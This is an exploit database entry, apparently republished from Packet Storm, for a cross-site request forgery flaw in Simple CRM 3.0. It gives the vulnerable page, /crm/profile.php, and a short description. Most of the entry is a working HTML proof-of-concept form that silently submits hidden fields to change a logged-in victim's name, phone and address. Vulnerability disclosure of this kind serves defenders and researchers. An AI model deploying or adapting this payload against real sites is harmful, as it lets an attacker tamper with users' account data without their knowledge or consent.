Share
## https://sploitus.com/exploit?id=PACKETSTORM:163220
# Exploit Title: Simple CRM 3.0 - 'Change user information' Cross-Site Request Forgery (CSRF)  
# Date: 20/06/2021  
# Exploit Author: Riadh Benlamine (rbn0x00)  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link: https://phpgurukul.com/small-crm-php/  
# Version: 3.0  
# Category: Webapps  
# Tested on: Apache2+MariaDB latest version  
# Description : Simple CRM suffers from Cross-site request forgery, which the attacker can manipulate user data via triggering user to visit suspicious url  
  
Vulnerable page: /crm/profile.php  
  
POC:  
----  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://localhost/crm/profile.php" method="POST" enctype="multipart/form-data">  
<input type="hidden" name="name" value="test" />  
<input type="hidden" name="alt_email" value="" />  
<input type="hidden" name="phone" value="0123456789" />  
<input type="hidden" name="gender" value="m" />  
<input type="hidden" name="address" value="jgjgjgjjggjcsrf" />  
<input type="hidden" name="update" value="Update" />  
<input type="submit" value="Exploit" />  
</form>  
</body>  
</html>